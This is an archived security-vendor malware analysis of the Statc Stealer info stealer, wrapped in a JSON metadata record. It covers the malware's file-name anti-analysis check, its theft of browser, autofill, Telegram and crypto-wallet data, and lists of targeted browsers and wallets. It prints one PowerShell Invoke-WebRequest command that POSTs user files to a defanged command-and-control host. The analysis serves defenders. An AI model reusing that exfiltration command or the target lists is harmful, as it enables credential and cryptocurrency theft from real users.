{
	"id": "639ef749-25a5-484e-b026-02f22fc5b907",
	"created_at": "2026-04-06T00:14:07.052001Z",
	"updated_at": "2026-04-10T03:21:48.301973Z",
	"deleted_at": null,
	"sha1_hash": "8bc23437d37840db9d813d3bdce160cb4d64673b",
	"title": "Statc Stealer | ThreatLabz",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 2551278,
	"plain_text": "Statc Stealer | ThreatLabz\r\nBy Shivam Sharma, Amandeep Kumar\r\nPublished: 2023-08-08 · Archived: 2026-04-05 21:50:14 UTC\r\nTechnical Analysis\r\nEvasion using anti-analysis techniques\r\nTypically, info stealers like Statc Stealer employ sophisticated techniques to avoid detection and persist on the\r\nvictim’s machine.\r\nWe found one anti-analysis technique while analyzing Statc Stealer:\r\nThe sample looks for its original file name\r\nChecks whether its file name is the same as its internal name \r\nStops executing if it finds differences\r\nEssentially, if Statc Stealer discovers that you’ve changed or updated its malicious files, then it stops in its tracks. \r\nThe code example in the image below shows how:\r\nThe sample used a FileName check\r\nThe sample compares the file name with a hardcoded encrypted string  \r\nFigure 3:  File name comparison code\r\nTheft and exfiltration of data\r\nStealing activity\r\nhttps://www.zscaler.com/blogs/security-research/statc-stealer-decoding-elusive-malware-threat\r\nPage 1 of 9\n\nStatc Stealer has a general information stealing capability. It’s able to take sensitive information from various\r\nbrowsers and wallets, and then store the data in a text file inside a Temp folder.\r\nUsing the python script we mentioned above, we decrypted Statc Stealer’s encrypted strings.\r\nThe image below shows various references to “wallets'' and “crypto”, indicating that sensitive cryptocurrency\r\ninformation has been compromised.\r\nFigure 4:  Decrypted strings using python script\r\nEncrypted strings\r\nhttps://www.zscaler.com/blogs/security-research/statc-stealer-decoding-elusive-malware-threat\r\nPage 2 of 9\n\nhttps://www.zscaler.com/blogs/security-research/statc-stealer-decoding-elusive-malware-threat\r\nPage 3 of 9\n\nFigure 5:  Encrypted strings \r\nDecrypted strings\r\nFigure 6:  Decrypted strings\r\nhttps://www.zscaler.com/blogs/security-research/statc-stealer-decoding-elusive-malware-threat\r\nPage 4 of 9\n\nBrowser exfiltration\r\nBrowser exfiltration is the unauthorized transfer of any data from a browser. It can involve social engineering,\r\nphishing attacks and emails, and even uploading data to an insecure hard drive. \r\nHowever, Statc Stealer uses its malicious software to drop and execute malicious files. Let’s explore how this\r\nworks.\r\nHow it works\r\nStatc Stealer employs a straightforward and easily detectable technique to steal browser data. It leverages the\r\nInvoke-WebRequest Uniform Resource Identifier (URI) in PowerShell to initiate a process, using the following\r\narguments:\r\nInvoke-WebRequest -Uri https[:]//topgearmemory[.]com/kdsfedafa/stat?c= -Method POST -InFile C:\\Users\\\r\nThe significance of Statc Stealer's exfiltration technique lies in its potential to steal sensitive browser data and\r\nsend it securely to its C\u0026C server. This allows the malware to harvest valuable information, such as login\r\ncredentials and personal details, for malicious purposes like identity theft and financial fraud. Despite its\r\nsimplicity, the technique aids security experts in detecting and analyzing the malware's behavior, enabling the\r\ndevelopment of effective countermeasures. \r\nTargeted browsers\r\nThe Statc Stealer malware can exfiltrate data from the following browsers:\r\nChrome\r\nMicrosoft Edge\r\nBrave\r\nOpera\r\nYandex\r\nMozilla Firefox\r\nIt comes as no surprise that Statc Stealer, with its PE structure, strategically targets the most popular Windows\r\nbrowsers, By capitalizing on their widespread usage, this info stealer can cast a wider net, seeking to compromise\r\nsensitive data from a larger pool of unsuspecting users.\r\nStealing autofill data\r\nStatc Stealer is also capable of exfiltrating autofill data. If a stealer takes autofill data, login credentials, Personally\r\nIdentifiable Information (PII) and payment information is at risk:\r\nUsernames and passwords\r\nEmail\r\nCredit card details\r\nhttps://www.zscaler.com/blogs/security-research/statc-stealer-decoding-elusive-malware-threat\r\nPage 5 of 9\n\nPersonal addresses\r\nPayment information\r\nStolen data \r\nFigure 7: Stolen data in decrypted form\r\nData in encrypted form\r\nFigure 8: Stolen data after encryption\r\nIn the images above, the Statc Stealer is exfiltrating browsers’ autofill information. From here, the malware will\r\nencrypt the stolen data and store it in a text file in the Temp folder.\r\nProcess Monitor (ProcMon)\r\nProcess Monitor (ProcMon) is an advanced monitoring tool for Windows that shows real-time file system,\r\nRegistry and process/thread activity. It can help provide a snapshot into the types of sensitive information Statc\r\nStealer is capable of stealing.\r\nhttps://www.zscaler.com/blogs/security-research/statc-stealer-decoding-elusive-malware-threat\r\nPage 6 of 9\n\nUsing ProcMon, we observed that Statc Stealer steals:\r\nuser’s cookies data\r\nweb data\r\nlocal state \r\ndata preferences \r\nlogin data\r\nvarious different wallets information\r\nFileZilla\r\nbrowsers autofills\r\nanydesk \r\nronin_edge\r\nmeta mask \r\nTelegram data\r\nWe captured this malicious activity in ProcMon in the image below.\r\nhttps://www.zscaler.com/blogs/security-research/statc-stealer-decoding-elusive-malware-threat\r\nPage 7 of 9\n\nFigure 9: Browser related data shown in ProcMon\r\nWallet data\r\nThe Statc Stealer can exfiltrate data from various wallets, like:\r\nCryptocom-Wallet\r\nPetra-aptos-wallet\r\nexodus-web3-wallet\r\nbitkeep-crypto-nft-wallet\r\nliquality-wallet\r\nethos-sui-wallet\r\nsuite-sui-wallet\r\ntallsman-polkadot-wallet\r\nhttps://www.zscaler.com/blogs/security-research/statc-stealer-decoding-elusive-malware-threat\r\nPage 8 of 9\n\nEnkrypt-ethereum-polkadot\r\nleap-cosmos-wallet\r\npontem-aptos-wallet\r\nfewcha-move-wallet\r\nrise-aptos-wallet\r\nteleport-wallet\r\nmartin-wallet-aptos-sui\r\navana-wallet-solana-wallet\r\nglow-solana-wallet-beta\r\nsolflare-wallet\r\nSource: https://www.zscaler.com/blogs/security-research/statc-stealer-decoding-elusive-malware-threat\r\nhttps://www.zscaler.com/blogs/security-research/statc-stealer-decoding-elusive-malware-threat\r\nPage 9 of 9",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://www.zscaler.com/blogs/security-research/statc-stealer-decoding-elusive-malware-threat"
	],
	"report_names": [
		"statc-stealer-decoding-elusive-malware-threat"
	],
	"threat_actors": [],
	"ts_created_at": 1775434447,
	"ts_updated_at": 1775791308,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/8bc23437d37840db9d813d3bdce160cb4d64673b.pdf",
		"text": "https://archive.orkl.eu/8bc23437d37840db9d813d3bdce160cb4d64673b.txt",
		"img": "https://archive.orkl.eu/8bc23437d37840db9d813d3bdce160cb4d64673b.jpg"
	}
}